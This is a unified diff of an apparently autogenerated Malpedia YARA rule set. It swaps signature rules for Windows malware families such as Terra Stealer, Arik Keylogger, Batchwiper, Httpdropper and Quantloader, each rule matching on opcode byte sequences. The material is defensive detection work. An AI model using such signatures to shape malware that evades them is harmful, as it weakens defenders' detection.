+		$sequence_1 = { 75f7 2bca 8d7c243c 8bf2 8bd1 }
+		$sequence_2 = { 881c24 e8???????? d2cd 80d213 66c1e204 8b5500 f8 }
+		$sequence_3 = { eb09 8b442430 2bc1 c1f802 8d3c8500000000 57 }
+		$sequence_4 = { c604243a 9c 8d642434 e9???????? }
+		$sequence_5 = { 84c0 75c1 8d442404 50 }
+		$sequence_6 = { e9???????? 66894500 66897c240c 882c24 }
+		$sequence_7 = { 0f8482000000 55 e8???????? 8b1d???????? }
+		$sequence_8 = { e8???????? 881438 e8???????? 9c c6442408cf 894508 e9???????? }
+		$sequence_9 = { 6800100000 51 8bf0 ff15???????? }
+		$sequence_10 = { 46 66892c24 9c 8d64244c e9???????? 9c }
+		$sequence_11 = { 88442408 50 8d642434 e9???????? }
+		$sequence_12 = { 3b54242c 0f84d5000000 b83092c201 33ff e8???????? 85c0 }
+		$sequence_13 = { e9???????? 883424 ff742420 8f4500 9c }
+		$sequence_14 = { f5 88742408 c70424ba7bbfa4 660fbae408 662dca11 e8???????? 881438 }
+		$sequence_15 = { 8b542438 6888130000 52 ff15???????? }
 
 	condition:
-		7 of them and filesize < 401408
+		7 of them and filesize < 10817536
 }
-rule MALPEDIA_Win_Sharpknot_Auto : FILE
+rule MALPEDIA_Win_Batchwiper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "45650ffc-30fa-59dd-9298-17c525a596bf"
+		id = "8e0f816b-f334-5f53-bde8-8c13e5a1573a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sharpknot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sharpknot_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.batchwiper_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "f79cb6af16b4be17278bbf2846f42541c5c87bd486108c50193c9587c9073fc1"
+		logic_hash = "7b7cda4dab9bb8ec218294d77768f35a5d54eba78e3d583128b9f7cf9e6690f0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116724,71 +116701,71 @@ rule MALPEDIA_Win_Sharpknot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d8c246c020000 c7842498050000ffffffff e8???????? 8b8c2490050000 }
-		$sequence_1 = { 8d542420 8bcf b8abaaaa2a 2bcd 52 f7e9 c1fa02 }
-		$sequence_2 = { 8bca 897c2430 c1e91f 03d1 83fa01 0f83b3000000 8bcb }
-		$sequence_3 = { e8???????? 8b8c2490050000 5f 5e 5d 33c0 5b }
-		$sequence_4 = { 8a8681f84400 2410 3c10 7508 660fb6b680f74400 }
-		$sequence_5 = { 7f08 81f90000a000 7616 6800001000 8d542414 6a01 }
-		$sequence_6 = { 51 e8???????? 89442448 89442428 8b44243c 895c2434 8954244c }
-		$sequence_7 = { 7522 8d44240c 50 e8???????? 8bf0 83c408 85f6 }
-		$sequence_8 = { f3a4 b910000000 8d7c2414 f3ab 8d442454 8d4c2410 50 }
-		$sequence_9 = { 8b520c 52 e8???????? 83c404 }
+		$sequence_0 = { a1???????? 50 50 ff742408 e8???????? 8d0d2cb14000 5a }
+		$sequence_1 = { 8d0d24b14000 5a e8???????? c744240c02000000 }
+		$sequence_2 = { a1???????? 50 50 ff35???????? ff35???????? e8???????? 8d0d9cb14000 }
+		$sequence_3 = { 8d0d44b14000 e8???????? ba???????? 8d0d48b14000 e8???????? ba???????? 8d0d4cb14000 }
+		$sequence_4 = { ff96e0de0100 09c0 7407 8903 }
+		$sequence_5 = { e8???????? a3???????? 8b1d???????? 21db 7e65 c705????????00000000 8b1d???????? }
+		$sequence_6 = { e8???????? ba???????? 8d0d60b14000 e8???????? ba???????? 8d0d64b14000 e8???????? }
+		$sequence_7 = { 893d???????? c705????????dd424000 c705????????80464000 c705????????da464000 }
+		$sequence_8 = { 8b442408 894514 8b442404 894518 }
+		$sequence_9 = { 46 46 53 686d490100 57 }
 
 	condition:
-		7 of them and filesize < 1032192
+		7 of them and filesize < 270336
 }
-rule MALPEDIA_Win_Unidentified_101_Auto : FILE
+rule MALPEDIA_Win_Lechiket_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1e5a977c-e7e9-5732-97b6-6aadc4f691fc"
-		date = "2023-03-28"
-		modified = "2023-04-07"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_101"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_101_auto.yar#L1-L128"
+		id = "08dac53f-197a-5416-a7db-8f3c1de4ec77"
+		date = "2026-01-05"
+		modified = "2026-01-06"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lechiket"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lechiket_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "71f0751fbd77a928634515b558d06922b4bf4a312042d6abbd6ba70171c64843"
+		logic_hash = "fc33b6d2e9f07c53a0ef858e0194b9a6cf5341ef888af832ba9746c5214aaca1"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20230328"
-		malpedia_hash = "9d2d75cef573c1c2d861f5197df8f563b05a305d"
-		malpedia_version = "20230407"
+		malpedia_rule_date = "20260105"
+		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
+		malpedia_version = "20251219"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c70016000000 e8???????? 83c8ff e9???????? 498bc4 488d0ddb070100 83e03f }
-		$sequence_1 = { 6689842404010000 b865000000 6689842406010000 33c0 6689842408010000 }
-		$sequence_2 = { 33c0 b968000000 f3aa 488d842400010000 4889442448 488d842430020000 4889442440 }
-		$sequence_3 = { 4889742410 57 4883ec20 418bf0 4c8d0debb40000 8bda 4c8d05dab40000 }
-		$sequence_4 = { c744243000000000 4c8d4c2430 4c8b442440 8b542468 488b4c2460 }
-		$sequence_5 = { c68424e900000065 c68424ea00000057 c68424eb00000000 c644243052 c644243165 c644243261 c644243364 }
-		$sequence_6 = { 428a8c1910e40100 4c2bc0 418b40fc 4d894108 d3e8 41894120 }
-		$sequence_7 = { 48c744242000000000 4c8d8c24c8000000 448b442450 488b542458 488b4c2470 ff15???????? }
-		$sequence_8 = { 41b804010000 488d942400030000 33c9 ff15???????? c744245801000000 e8???????? 833d????????01 }
-		$sequence_9 = { 7528 48833d????????00 741e 488d0dd8450100 e8???????? 85c0 740e }
+		$sequence_0 = { 57 ff15???????? 3d02010000 7519 56 ff15???????? 53 }
+		$sequence_1 = { 57 eb4b 8a16 80fac0 }
+		$sequence_2 = { 740f 47 3b7d0c 76d6 33c0 }
+		$sequence_3 = { 51 ff7518 8365fc00 ff7514 8d4510 }
+		$sequence_4 = { c786????????1a000000 8a550b 8bcb ff15???????? 5f 5e }
+		$sequence_5 = { ff750c e8???????? 85c0 0f84bdfdffff 8b4df8 8d7c0f01 8d480a }
+		$sequence_6 = { 85d2 7505 b80d0000c0 85ff 5e 740c 85c0 }
+		$sequence_7 = { e8???????? 84c0 7504 fec0 eb1c 53 8bce }
+		$sequence_8 = { 33f6 39750c 57 7613 ff15???????? 88843500ffffff 46 }
+		$sequence_9 = { 8945f8 8d45d0 6808070000 50 }
 
 	condition:
-		7 of them and filesize < 402432
+		7 of them and filesize < 331776
 }
-rule MALPEDIA_Win_Terra_Stealer_Auto : FILE
+rule MALPEDIA_Win_Arik_Keylogger_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "234ed187-f851-554b-a630-3727e334e709"
+		id = "7c7e785e-68b0-5d15-8779-d3bc99c37de2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.terra_stealer_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.arik_keylogger_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "ba7828bda62d9e0272e6a0dfd1c69067ed7e871d009d7d515799e6dd5814f419"
+		logic_hash = "3dfa4619d5193e3c6023ed0580ae1b26d4332f72fbcfed50985df75f7171bee8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116802,33 +116779,33 @@ rule MALPEDIA_Win_Terra_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 0f8523030000 488b0f 4885c9 7405 e8???????? 4180fc05 }
-		$sequence_1 = { e8???????? 488983f0120000 4885c0 7456 41b80f000000 488d15302f0900 488bcb }
-		$sequence_2 = { eb04 4c8b7d28 4533c9 4533c0 488d1525861d00 488d4c2478 ff15???????? }
-		$sequence_3 = { ffca 84c0 7425 8bc8 410fb600 420fb6843840061f00 4238843940061f00 }
-		$sequence_4 = { 0f8c6effffff 4533c9 418b5708 498bc1 8b7e08 85d2 498bcc }
-		$sequence_5 = { ffc0 84c9 75e9 4863c8 4881f9f4010000 0f8339070000 488d8550010000 }
-		$sequence_6 = { eb24 498b4e10 4885c9 7415 0f1f00 8b4164 2403 }
-		$sequence_7 = { eb07 896b2c c6430144 488bc3 488b5c2478 4883c430 415d }
-		$sequence_8 = { e9???????? 488d8ae80f0000 e9???????? 488d8a00100000 e9???????? 488d8a18100000 e9???????? }
-		$sequence_9 = { e9???????? 488b5308 488d05d334f3ff 48ff42f8 4c8b4318 488b3b 4981f8ffffff7f }
+		$sequence_0 = { b8???????? e8???????? 83f801 0f85cb000000 8d45b8 e8???????? c745b800000000 }
+		$sequence_1 = { 8d55b0 e8???????? 8b55b0 8d45ac b9???????? e8???????? 8b55ac }
+		$sequence_2 = { e8???????? 8b45f8 80780700 740b 8d55f0 8b45f8 e8???????? }
+		$sequence_3 = { e8???????? 84c0 741d 6a00 6a00 68c6000000 8b45fc }
+		$sequence_4 = { c645f400 8b55fc b8???????? e8???????? 84c0 0f84b3010000 8b45fc }
+		$sequence_5 = { e8???????? 89c1 81f9ff000000 7605 e8???????? 8802 eb08 }
+		$sequence_6 = { e8???????? 88459c 8b45a8 48 83f804 7723 ff248590826100 }
+		$sequence_7 = { e8???????? c745d000000000 8d4dd0 89d8 ba07000000 8b33 ff5678 }
+		$sequence_8 = { 8d45e4 baffffffff e8???????? 8945f8 c645ec00 8d4dd8 8d55c0 }
+		$sequence_9 = { b8???????? e8???????? 84c0 741b 8b45fc 8b80a8020000 8b55f4 }
 
 	condition:
-		7 of them and filesize < 4621312
+		7 of them and filesize < 4947968
 }
-rule MALPEDIA_Win_Powersniff_Auto : FILE
+rule MALPEDIA_Win_Wndtest_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2a881adf-7d1a-56c3-b5e7-0d44ba58f640"
+		id = "fa7e1d3e-ff37-533f-8f3a-ddc800dad583"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.powersniff_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wndtest"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wndtest_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "5f0dc4acb7c58a41f657c7beac5f0371e51ded838f8edb6d41966e6195e43ff4"
-		score = 75
+		logic_hash = "e52dae40ef4794c37daf120253466cc3a5d1ee85941c6b51e3b69e035267f66f"
+		score = 50
 		quality = 75
 		tags = "FILE"
 		version = "1"
@@ -116841,32 +116818,32 @@ rule MALPEDIA_Win_Powersniff_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b5dec ff75fc e8???????? 8bd8 3bde }
-		$sequence_1 = { 894df4 33ff eb08 3c0d 7408 47 }
-		$sequence_2 = { c745e04d9b0010 c745e46f910010 c745e8a2910010 c745ec549b0010 c745f0c2910010 }
-		$sequence_3 = { 8b4508 56 be???????? 57 8908 8a03 894dfc }
-		$sequence_4 = { 8975ec 8b75f4 c1ee18 8b34b590740010 }
-		$sequence_5 = { eb12 c745fc08000000 eb09 ff15???????? 8945fc 8b45fc 5f }
-		$sequence_6 = { 33db 43 5e 5f ff75fc ff15???????? ff75f0 }
-		$sequence_7 = { 750f ff15???????? 3de5030000 750d eb09 ff7610 }
-		$sequence_8 = { ff15???????? 8bf8 897df0 3bfb 7435 8d4508 50 }
-		$sequence_9 = { 331cb590840010 c1ea18 8b349590780010 8b55f4 335808 c1ea08 }
+		$sequence_0 = { 89461c 8907 894704 894708 89470c 894710 }
+		$sequence_1 = { 8945fc eb03 8b45fc 8b5d08 }
+		$sequence_2 = { 53 6a00 ff15???????? 6a0d ff15???????? }
+		$sequence_3 = { 8b4de8 41 51 e8???????? 83c404 }
+		$sequence_4 = { 5e 8be5 5d c3 880c3e 5f 5e }
+		$sequence_5 = { 6805010000 e8???????? 83c404 6804010000 8bd8 53 6a00 }
+		$sequence_6 = { 33c9 8d460a ba02000000 f7e2 0f90c1 f7d9 }
+		$sequence_7 = { 50 56 ffd7 a3???????? 8b0d???????? 8b15???????? }
+		$sequence_8 = { 46 895dfc 3b750c 7cbe 5f }
+		$sequence_9 = { c3 880c3e 5f 5e }
 
 	condition:
-		7 of them and filesize < 90112
+		7 of them and filesize < 901120
 }
-rule MALPEDIA_Win_Royalcli_Auto : FILE
+rule MALPEDIA_Win_Httpdropper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9a5a0dbf-041d-5a71-ace4-cc85bbf8dbac"
+		id = "18260766-6bdf-5211-bbc4-97447962c71b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.royalcli"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.royalcli_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.httpdropper_auto.yar#L1-L186"
 		license_url = "N/A"
-		logic_hash = "c1838945d5c33b64e750d6ae434f43dd65441d3926695dd6e2b710434dc1c7bb"
+		logic_hash = "22451066791784b19aa73ef3663c2f2d2a5d036611d6a095731732bebf19aeab"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116880,32 +116857,38 @@ rule MALPEDIA_Win_Royalcli_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a02 53 56 c745e844006900 c745ec73006100 c745f062006c00 c745f465004300 }
-		$sequence_1 = { 33f6 85ff 7e4b 4f c1ef02 8d4a01 }
-		$sequence_2 = { 66895008 6800000080 8d85d8fdffff 50 ffd3 83f8ff 7421 }
-		$sequence_3 = { 6840000100 89b5c0feffff e8???????? 83c404 }
-		$sequence_4 = { 5d c3 56 57 6a01 50 e8???????? }
-		$sequence_5 = { 33cd e8???????? 8be5 5d c3 8b85e8fcffff 6840771b00 }
-		$sequence_6 = { 68???????? ffd7 8d55e8 52 e8???????? 83c404 8bd8 }
-		$sequence_7 = { 8b5d0c 8995bcf9ffff 8b5518 899da8f9ffff 8995b8f9ffff 7d11 33c0 }
-		$sequence_8 = { 8b85bcfeffff 50 33f6 ff15???????? e9???????? 3d00000100 0f8f2bffffff }
-		$sequence_9 = { 8d85c4fdffff 50 68???????? 68???????? 68???????? ffd6 bf???????? }
+		$sequence_0 = { 8bd8 8985d0f0ffff 85db 0f8482000000 6a3c 8d8554f0ffff 6a00 }
+		$sequence_1 = { 3dff000000 0f87c3020000 f685a8f7ffff10 0f844f010000 8b751c 3bf3 0f8444010000 }
+		$sequence_2 = { 83c40c 6803010000 8d8c2444030000 51 c744241400000000 ff15???????? 8b3d???????? }
+		$sequence_3 = { 75f9 2bc1 7511 33c0 5e 8b4dfc 33cd }
+		$sequence_4 = { b9???????? 8bf0 e8???????? 50 8d9435f4feffff 68???????? 52 }
+		$sequence_5 = { 8d8d64f2ffff e8???????? 687f0c0000 8d856df2ffff }
+		$sequence_6 = { 50 8d95f8feffff 52 e8???????? 83c408 85c0 }
+		$sequence_7 = { 8bc6 c1f805 8d0c8560aa0310 8bc6 83e01f c1e006 8b11 }
+		$sequence_8 = { 41b800040000 c684246002000000 e8???????? 488d8c2470060000 4c8bcf ba01000000 41b800040000 }
+		$sequence_9 = { 48894c2450 498bf0 0fb6fa 488d8da1000000 33d2 41b80b030000 }
+		$sequence_10 = { 48c7c102000080 4889442420 ff15???????? 85c0 0f8513010000 488d0d761d0200 c744244004000000 }
+		$sequence_11 = { 488985400f0000 4c8bb5c00f0000 48894c2450 4d8be0 4c89442448 488bf2 488d8d31060000 }
+		$sequence_12 = { 41f7e8 c1fa05 4c8d0520440200 8bc2 c1e81f 03d0 }
+		$sequence_13 = { 488bd0 ff15???????? 488d0d6b080200 488905???????? e8???????? 488bcb }
+		$sequence_14 = { 53 55 56 4154 4155 4883ec50 448bca }
+		$sequence_15 = { 450fb6c0 4489542430 89542428 894c2420 488d1599d50100 488d8c2490000000 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 524288
 }
-rule MALPEDIA_Win_Cohhoc_Auto : FILE
+rule MALPEDIA_Win_Chiser_Client_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "eea8dd21-8908-5be8-a2a6-255fd0ffd6ca"
+		id = "c99b11d6-95f8-5089-bb79-3dcbcddf715f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cohhoc_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chiser_client"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chiser_client_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "722fe87316c37305b3652db78bba219c2fd88a714a6565f0318a82058c8a1b30"
+		logic_hash = "a4f562ea6b25a50fa272453bc9361d6900c9cafcbad3f751e3aa04995d53620d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116919,32 +116902,32 @@ rule MALPEDIA_Win_Cohhoc_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b9c242c3c0000 66ab aa b9000f0000 33c0 8d7c2420 c745008d000000 }
-		$sequence_1 = { 57 33c0 bf???????? 83c9ff f2ae }
-		$sequence_2 = { 50 68???????? 68???????? c74424200c000000 895c2424 c744242801000000 ffd6 }
-		$sequence_3 = { 8d7c244c 83c9ff 33c0 83c420 f2ae }
-		$sequence_4 = { 8b4c2420 8b542424 8b6c2428 8b5c242c 6a08 }
-		$sequence_5 = { be???????? 8d7c2410 33ed f3a5 8b4c245c }
-		$sequence_6 = { 8d442410 53 50 68???????? 68???????? c74424200c000000 }
-		$sequence_7 = { 894c2410 89442414 0f85f5feffff b801000000 5f 895d08 }
-		$sequence_8 = { 8944242c 0f85b5feffff 8bce e8???????? 668b5702 50 }
-		$sequence_9 = { 8b0d???????? 891d???????? 51 c705????????02000000 e8???????? 83c420 }
+		$sequence_0 = { 48890a 48894a08 488d4808 e8???????? 488d05a9e30200 488903 488bc3 }
+		$sequence_1 = { 480f40c1 488bc8 e8???????? 488bc8 49890424 }
+		$sequence_2 = { 0f1f440000 418d40fc 460fb61408 418d40fd 460fb61c08 }
+		$sequence_3 = { c744245865007800 c744245c2e006800 c744246074006d00 c74424646c000000 4c89742430 bf01000000 897c2428 }
+		$sequence_4 = { 498b0e 4c8d4110 488d5108 e8???????? 90 488bcb e8???????? }
+		$sequence_5 = { 41b904000000 0f1f440000 b904000000 6666660f1f840000000000 410fb60414 }
+		$sequence_6 = { 488bc5 0f1f00 48ffc0 66833c4100 75f6 83c008 4863f8 }
+		$sequence_7 = { 48636908 488bf1 4c8b7118 b802000000 }
+		$sequence_8 = { 48894320 488d1511f5ffff e8???????? eb09 488bcb ff15???????? 408ac5 }
+		$sequence_9 = { 81ca00000780 85c0 0f4ed0 e8???????? 488d1584aa0100 488d4c2440 }
 
 	condition:
-		7 of them and filesize < 253952
+		7 of them and filesize < 714752
 }
-rule MALPEDIA_Win_Bitter_Rat_Auto : FILE
+rule MALPEDIA_Win_Sys10_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b191a00c-6fde-5571-a34e-d2213ef4e8fa"
+		id = "f6b87c71-e5a8-51b9-bf42-5ce35b9897c0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bitter_rat_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.sys10_auto.yar#L1-L112"
 		license_url = "N/A"
-		logic_hash = "a43bde583e40f1f224309d84df87c4be4d19f266b740acdb3a4dfc9719f341d8"
+		logic_hash = "34aa3f50a631ab8b6462b3454dab9cbf3c83a5ccbafc56348e488e070debe8a8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116958,32 +116941,32 @@ rule MALPEDIA_Win_Bitter_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 42 00542f42 00cf 2f }
-		$sequence_1 = { 68d4070000 e8???????? 83c414 a1???????? }
-		$sequence_2 = { 6a02 6a04 8d85d4fdffff 50 ff15???????? }
-		$sequence_3 = { 83e11f c1e106 8b048500124700 c644080401 57 }
-		$sequence_4 = { 51 8b954cd9ffff 8d84157cdcffff 50 e8???????? 83c40c 8b854cd9ffff }
-		$sequence_5 = { f3ab c745f8???????? b80a000000 668945ec b802000000 668945e0 0fbf45ec }
-		$sequence_6 = { 03048d00124700 eb02 8bc2 f6402480 0f8567ffffff 33c0 }
-		$sequence_7 = { 03c7 03cf 83ff1f 0f87da030000 ff24bda8864200 8bc6 e9???????? }
-		$sequence_8 = { 8bf4 8d8568feffff 50 6a02 ff15???????? 3bf4 }
-		$sequence_9 = { 8d8d68faffff 51 e8???????? 83c408 8bf4 8d85acfeffff }
+		$sequence_0 = { 50 ffd7 8b4b08 51 }
+		$sequence_1 = { 7511 6810270000 ff15???????? 33c0 }
+		$sequence_2 = { ffd3 6a00 6a00 6a00 6a00 8bf8 }
+		$sequence_3 = { 7407 53 ff15???????? 8b06 50 }
+		$sequence_4 = { 53 52 e8???????? 83c42c 85c0 }
+		$sequence_5 = { ffd7 8b4304 50 ffd7 8b4b08 51 }
+		$sequence_6 = { 52 ffd7 8b4308 50 }
+		$sequence_7 = { 57 8d542438 53 52 e8???????? }
+		$sequence_8 = { 6a00 897c2434 894c242c 89742438 }
+		$sequence_9 = { 52 6a05 50 ffd6 8b5308 }
 
 	condition:
-		7 of them and filesize < 1130496
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Holerun_Auto : FILE
+rule MALPEDIA_Win_Quantloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "79210bcf-218e-5107-a109-edeb02cfeccf"
+		id = "a6fbe65e-ef8a-5bc4-b8a9-95dfb59d427c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.holerun"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.holerun_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quantloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.quantloader_auto.yar#L1-L174"
 		license_url = "N/A"
-		logic_hash = "089e5eef0cb363abe6346868d7bc24f6b1004eaa9f42643e6a6b76322b0e9b60"
+		logic_hash = "bf8a50a2e031ac2dab43be4a697ae58f19b78ab51aef8ac12657d4c13c8a8701"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -116997,34 +116980,40 @@ rule MALPEDIA_Win_Holerun_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d45c0 4989c9 4989d0 ba00040000 4889c1 e8???????? 488b85f0030000 }
-		$sequence_1 = { 488b85e0020000 488b4008 ba20000000 4889c1 e8???????? 488985c0020000 4883bdc002000000 }
-		$sequence_2 = { 750a b8ffffffff e9???????? 488b4510 488b00 8b00 3d910000c0 }
-		$sequence_3 = { 48837df000 751b 488b4510 488b00 488d1502380000 }
-		$sequence_4 = { ba20000000 4889c1 e8???????? 488945f0 48837df000 0f84dd000000 488345f001 }
-		$sequence_5 = { eb31 488b05???????? ffd0 89c1 488b85e0020000 }
-		$sequence_6 = { 488345f808 488d050f8a0000 483945f8 75d1 b801000000 4883c430 5d }
-		$sequence_7 = { 48c1e002 4889c2 488d0549650000 890c02 }
-		$sequence_8 = { 488985a0000000 c785cc02000000000000 e9???????? 8b85cc020000 4898 488b84c590000000 }
-		$sequence_9 = { 750c b91f000000 e8???????? eb39 488b05???????? 8b00 85c0 }
+		$sequence_0 = { 8945f8 837df800 7405 8b45f8 ffd0 c9 c3 }
+		$sequence_1 = { e8???????? c744240800000000 c7442404???????? 8b4508 890424 e8???????? 85c0 }
+		$sequence_2 = { 8b45f8 40 8945f0 eb13 }
+		$sequence_3 = { c785d4f7ffff00000000 e9???????? c744241400000000 c744241000000084 c744240c00000000 c744240800000000 8b4508 }
+		$sequence_4 = { c70424???????? e8???????? 83ec08 8b450c }
+		$sequence_5 = { 837df400 750f c785d4f7ffff00000000 e9???????? }
+		$sequence_6 = { c70424???????? e8???????? 85c0 0f8eaa000000 }
+		$sequence_7 = { e8???????? 89442404 c70424???????? e8???????? c7442408???????? c7442404???????? c7042402000080 }
+		$sequence_8 = { 33c0 66ad 66a90030 7408 }
+		$sequence_9 = { c3 8b7d74 6a04 6800100000 57 6a00 ff5510 }
+		$sequence_10 = { 60 8bf3 03763c 8bb680000000 85f6 }
+		$sequence_11 = { c7457c00000000 81c243e15762 8b4d74 8bfe 837d6400 7403 017564 }
+		$sequence_12 = { 7410 b904000000 48 7408 b940000000 48 7400 }
+		$sequence_13 = { 8bf8 f3a4 e8???????? 48 }
+		$sequence_14 = { 51 50 54 6a04 51 57 ff550c }
+		$sequence_15 = { 33c0 39411c 74f7 ff711c 8f4550 e8???????? 8f411c }
 
 	condition:
-		7 of them and filesize < 156672
+		7 of them and filesize < 155648
 }
-rule MALPEDIA_Win_Tinyfluff_Auto : FILE
+rule MALPEDIA_Win_Coreshell_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "261677c7-52da-544b-abba-e2c9762083b2"
+		id = "68c75bba-5c1e-5e9d-b9a1-c2a54cb41bad"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyfluff"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tinyfluff_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.coreshell_auto.yar#L1-L414"
 		license_url = "N/A"
-		logic_hash = "305926cc2d71188dd193eb77d1fd5b2696d785cc7114678a3a44727f806b5473"
+		logic_hash = "964533465ea71e27159b30ec40d2ad04ff56c4993e1303c6d09339c487e78d9b"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -117036,32 +117025,69 @@ rule MALPEDIA_Win_Tinyfluff_Auto : FILE
